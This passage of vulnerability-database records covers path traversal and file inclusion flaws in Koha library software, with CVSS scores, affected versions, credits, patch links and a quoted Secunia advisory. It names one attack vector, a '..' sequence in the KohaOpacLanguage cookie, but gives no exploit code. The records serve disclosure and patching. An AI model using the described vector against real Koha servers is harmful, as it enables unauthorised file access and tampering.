"id": "CNVD-2015-05199"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"date": "2018-12-31T00:00:00",
"db": "VULMON",
"id": "CVE-2015-4632"
},
{
"date": "2015-06-25T00:00:00",
"db": "BID",
"id": "75426"
},
{
"date": "2019-02-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"date": "2018-11-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201512-697"
},
{
"date": "2024-11-21T02:31:26.580000",
"db": "NVD",
"id": "CVE-2015-4632"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-697"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Koha Path traversal vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2015-008224"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-697"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201512-697"
}
],
"trust": 0.6
}
}
var-202001-1308
Vulnerability from variot
Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors. Koha Contains a path traversal vulnerability.Information may be altered. Koha is prone to the following security vulnerabilities: 1. An arbitrary file-access vulnerability 2. A directory-traversal vulnerability 3. An arbitrary file-write vulnerability 4. An SQL-injection vulnerability An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1308",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.08.23"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.12.10"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.10.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.12.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.03"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.10.13"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.8.22"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.14.2"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.12.9"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.10.12"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.8.23"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.14.3"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.12.10"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.10.13"
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "NVD",
"id": "CVE-2014-1923"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Chris Cormack, Galen Charlton, and John Lightsey",
"sources": [
{
"db": "BID",
"id": "65448"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1923",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2014-1923",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2014-1923",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2014-1923",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-1923",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-1923",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-1091",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008840"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1091"
},
{
"db": "NVD",
"id": "CVE-2014-1923"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors. Koha Contains a path traversal vulnerability.Information may be altered. Koha is prone to the following security vulnerabilities:\n1. An arbitrary file-access vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary file-write vulnerability\n4. An SQL-injection vulnerability\nAn attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1923"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008840"
},
{
"db": "BID",
"id": "65448"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1923",
"trust": 2.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/02/07/10",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/02/10/3",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008840",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1091",
"trust": 0.6
},
{
"db": "BID",
"id": "65448",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008840"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1091"
},
{
"db": "NVD",
"id": "CVE-2014-1923"
}
]
},
"id": "VAR-202001-1308",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5804196
},
"last_update_date": "2024-11-23T22:16:39.983000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security\u00a0release\u00a0-\u00a0February\u00a02014",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"title": "Koha Repair measures for path traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112802"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008840"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1091"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.0
},
{
"problemtype": "Path traversal (CWE-22) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008840"
},
{
"db": "NVD",
"id": "CVE-2014-1923"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"trust": 1.9,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
},
{
"trust": 1.9,
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-1923"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"trust": 0.3,
"url": "http://koha-community.org/"
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008840"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1091"
},
{
"db": "NVD",
"id": "CVE-2014-1923"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008840"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1091"
},
{
"db": "NVD",
"id": "CVE-2014-1923"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-07T00:00:00",
"db": "BID",
"id": "65448"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008840"
},
{
"date": "2020-01-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1091"
},
{
"date": "2020-01-24T17:15:12.250000",
"db": "NVD",
"id": "CVE-2014-1923"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-07T00:00:00",
"db": "BID",
"id": "65448"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008840"
},
{
"date": "2021-01-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1091"
},
{
"date": "2024-11-21T02:05:16.930000",
"db": "NVD",
"id": "CVE-2014-1923"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "65448"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Koha\u00a0 Vulnerabilities in path traversal",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008840"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-1091"
}
],
"trust": 0.6
}
}
var-201112-0305
Vulnerability from variot
Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm. LibLime Koha has a local file containing vulnerability. An attacker can exploit a vulnerability to gain sensitive information and execute arbitrary code in the context of a web server process, jeopardizing applications and computers. This may allow the attacker to compromise the application and computer; other attacks are also possible. Koha 3.4.x prior to 3.4.7 and 3.6.x prior to 3.6.1 are vulnerable. ----------------------------------------------------------------------
Secunia is hiring!
Find your next job here:
http://secunia.com/company/jobs/
TITLE: Koha "KohaOpacLanguage" Local File Inclusion Vulnerability
SECUNIA ADVISORY ID: SA46980
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46980
RELEASE DATE: 2011-11-25
DISCUSS ADVISORY: http://secunia.com/advisories/46980/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46980/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46980
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Akin Tosunlar has discovered a vulnerability in Koha, which can be exploited by malicious people to disclose sensitive information.
Input passed to the "KohaOpacLanguage" cookie value in cgi-bin/koha/mainpage.pl is not properly verified in cgi-bin/opac/opac-main.pl before being used to include files.
The vulnerability is confirmed in version 4.02.06. Other versions may also be affected.
SOLUTION: Fixed in the GIT repository.
Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
PROVIDED AND/OR DISCOVERED BY: Akin Tosunlar, Vigasis Labs
ORIGINAL ADVISORY: Vigasis Labs: http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability&lnk=exploits/18153
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201112-0305",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.04.06"
},
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.04.04"
},
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.04.00"
},
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.04.01"
},
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.06.00.000"
},
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.04.05"
},
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.04.03"
},
{
"model": "koha",
"scope": "eq",
"trust": 1.6,
"vendor": "koha",
"version": "3.04.02"
},
{
"model": "liblime koha",
"scope": "lte",
"trust": 1.0,
"vendor": "koha",
"version": "4.2"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.9,
"vendor": "koha",
"version": "3.4.1"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.9,
"vendor": "koha",
"version": "3.4.2"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.6"
},
{
"model": "liblime koha",
"scope": "lte",
"trust": 0.8,
"vendor": "koha",
"version": "4.2 and earlier"
},
{
"model": "koha",
"scope": "lt",
"trust": 0.8,
"vendor": "koha",
"version": "3.4"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.6.1"
},
{
"model": "koha",
"scope": "eq",
"trust": 0.8,
"vendor": "koha",
"version": "3.4.7"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "4.2"
},
{
"model": "liblime koha",
"scope": "eq",
"trust": 0.6,
"vendor": "koha",
"version": "4.2"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.6"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.4.6"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.6.1"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.4.7"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "liblime koha",
"version": "*"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.06.00.000"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.04.00"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.04.01"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.04.02"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.04.03"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.04.04"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.04.05"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "koha",
"version": "3.04.06"
}
],
"sources": [
{
"db": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-5088"
},
{
"db": "BID",
"id": "50812"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-130"
},
{
"db": "NVD",
"id": "CVE-2011-4715"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:koha:koha",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:koha:liblime_koha",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Akin Tosunlar(Vigasis Labs)",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201111-450"
}
],
"trust": 0.6
},
"cve": "CVE-2011-4715",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2011-4715",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2011-4715",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2011-4715",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201112-130",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "bc1048b6-1f7d-11e6-abef-000c29c66e3d"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003333"
},
{
"db": "CNNVD",
"id": "CNNVD-201112-130"
},
{
"db": "NVD",
"id": "CVE-2011-4715"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in cgi-bin/koha/mainpage.pl in Koha 3.4 before 3.4.7 and 3.6 before 3.6.1, and LibLime Koha 4.2 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the KohaOpacLanguage cookie to cgi-bin/opac/opac-main.pl, related to Output.pm. LibLime Koha has a local file containing vulnerability. An attacker can exploit a vulnerability to gain sensitive information and execute arbitrary code in the context of a web server process, jeopardizing applications and computers. This may allow the attacker to compromise the application and computer; other attacks are also possible. \nKoha 3.4.x prior to 3.4.7 and 3.6.x prior to 3.6.1 are vulnerable. ----------------------------------------------------------------------\n\nSecunia is hiring!\n\nFind your next job here:\n\nhttp://secunia.com/company/jobs/\n\n----------------------------------------------------------------------\n\nTITLE:\nKoha \"KohaOpacLanguage\" Local File Inclusion Vulnerability\n\nSECUNIA ADVISORY ID:\nSA46980\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46980/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46980\n\nRELEASE DATE:\n2011-11-25\n\nDISCUSS 